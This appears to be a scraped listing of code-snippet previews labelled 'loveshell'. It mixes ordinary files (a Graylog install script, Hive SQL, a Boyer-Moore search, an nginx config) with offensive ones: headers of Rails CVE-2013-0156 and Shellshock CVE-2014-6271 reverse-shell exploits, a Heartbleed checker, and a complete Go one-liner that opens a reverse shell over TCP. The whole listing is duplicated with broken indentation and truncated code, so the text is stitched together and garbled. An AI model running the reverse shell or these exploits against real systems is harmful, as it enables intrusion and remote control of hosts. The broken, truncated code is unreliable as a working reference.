loveshell

## rails_rce.rb
#!/usr/bin/env ruby
#
# Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0156)
#
# ## Advisory
#
#   https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion
#
# ## Caveats
#

## install_graylog.sh
#!/bin/bash

# WARNING: Don't use this in production since all passwords are kept at their default.

# mongodb
apt-key adv --keyserver keyserver.ubuntu.com --recv 7F0CEB10
echo -e "deb http://downloads-distro.mongodb.org/repo/ubuntu-upstart dist 10gen\n" > /etc/apt/sources.list.d/mongodb-10gen.list
apt-get update
apt-get install -y mongodb-10gen

## hive_prep.sql
create table dimension_rollup_periods
(period_id string, time_id string, begin_time timestamp, end_time timestamp)
STORED AS TEXTFILE;

/*Run make_periods.sh script*/

alter table dimension_rollup_periods set serdeproperties ('field.delim'=',');

LOAD DATA LOCAL INPATH 'periods/2012' OVERWRITE INTO TABLE dimension_rollup_periods;

## apache-logs-hive.sql
-- This is a Hive program. Hive is an SQL-like language that compiles
-- into Hadoop Map/Reduce jobs. It's very popular among analysts at
-- Facebook, because it allows them to query enormous Hadoop data
-- stores using a language much like SQL.

-- Our logs are stored on the Hadoop Distributed File System, in the
-- directory /logs/randomhacks.net/access.  They're ordinary Apache
-- logs in *.gz format.
--
-- We want to pretend that these gzipped log files are a database table,

## xssdetect.js
var page = require('webpage').create(),
    system = require('system'),
    address;

page.onInitialized = function () {
    page.evaluate(function () {
        // additional detection code here perhaps
        // f.e. detecting STORED/DOM XSS

    });

## csrf-lua.conf

server {
    listen 80;
	root /root/to/your/docroot;

	proxy_redirect off;
	proxy_intercept_errors on;
	proxy_set_header Host $host;
	proxy_set_header X-Real-IP $remote_addr;
	proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

## shell.go
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.go

## openssl-heartbleed-server.py
#!/usr/bin/python3
# openssl-heartbleed-server.py
# Check TLS clients for OpenSSL Heartbleed vulnerability.

import socketserver
import struct
import random


class HeartbleedServer(socketserver.BaseRequestHandler):

## BoyerMooreStringSearch.py
# Boyer Moore String Search implementation in Python
# Ameer Ayoub <ameer.ayoub@gmail.com>

# Generate the Bad Character Skip List
def generateBadCharShift(term):
    skipList = {}
    for i in range(0, len(term)-1):
        skipList[term[i]] = len(term)-i-1
    return skipList

## cve-2014-6271.py
# CVE-2014-6271 cgi-bin reverse shell
# Original: http://pastebin.com/raw.php?i=166f8Rjx

import httplib,urllib,sys
  if (len(sys.argv)<3):
    print "Usage: %s <host> <vulnerable CGI>" % sys.argv[0]
    print "Example: %s localhost /cgi-bin/test.cgi" % sys.argv[0]
  exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
	#!/usr/bin/env ruby
	#
	# Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0156)
	#
	# ## Advisory
	#
	# https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion
	#
	# ## Caveats
	#
	#!/bin/bash

	# WARNING: Don't use this in production since all passwords are kept at their default.

	# mongodb
	apt-key adv --keyserver keyserver.ubuntu.com --recv 7F0CEB10
	echo -e "deb http://downloads-distro.mongodb.org/repo/ubuntu-upstart dist 10gen\n" > /etc/apt/sources.list.d/mongodb-10gen.list
	apt-get update
	apt-get install -y mongodb-10gen
	create table dimension_rollup_periods
	(period_id string, time_id string, begin_time timestamp, end_time timestamp)
	STORED AS TEXTFILE;

	/Run make_periods.sh script/

	alter table dimension_rollup_periods set serdeproperties ('field.delim'=',');

	LOAD DATA LOCAL INPATH 'periods/2012' OVERWRITE INTO TABLE dimension_rollup_periods;
	-- This is a Hive program. Hive is an SQL-like language that compiles
	-- into Hadoop Map/Reduce jobs. It's very popular among analysts at
	-- Facebook, because it allows them to query enormous Hadoop data
	-- stores using a language much like SQL.

	-- Our logs are stored on the Hadoop Distributed File System, in the
	-- directory /logs/randomhacks.net/access. They're ordinary Apache
	-- logs in *.gz format.
	--
	-- We want to pretend that these gzipped log files are a database table,
	var page = require('webpage').create(),
	system = require('system'),
	address;

	page.onInitialized = function () {
	page.evaluate(function () {
	// additional detection code here perhaps
	// f.e. detecting STORED/DOM XSS

	});

	server {
	listen 80;
	root /root/to/your/docroot;

	proxy_redirect off;
	proxy_intercept_errors on;
	proxy_set_header Host $host;
	proxy_set_header X-Real-IP $remote_addr;
	proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
	#!/usr/bin/python3
	# openssl-heartbleed-server.py
	# Check TLS clients for OpenSSL Heartbleed vulnerability.

	import socketserver
	import struct
	import random


	class HeartbleedServer(socketserver.BaseRequestHandler):
	# Boyer Moore String Search implementation in Python
	# Ameer Ayoub <ameer.ayoub@gmail.com>

	# Generate the Bad Character Skip List
	def generateBadCharShift(term):
	skipList = {}
	for i in range(0, len(term)-1):
	skipList[term[i]] = len(term)-i-1
	return skipList
	# CVE-2014-6271 cgi-bin reverse shell
	# Original: http://pastebin.com/raw.php?i=166f8Rjx

	import httplib,urllib,sys
	if (len(sys.argv)<3):
	print "Usage: %s <host> <vulnerable CGI>" % sys.argv[0]
	print "Example: %s localhost /cgi-bin/test.cgi" % sys.argv[0]
	exit(0)

	conn = httplib.HTTPConnection(sys.argv[1])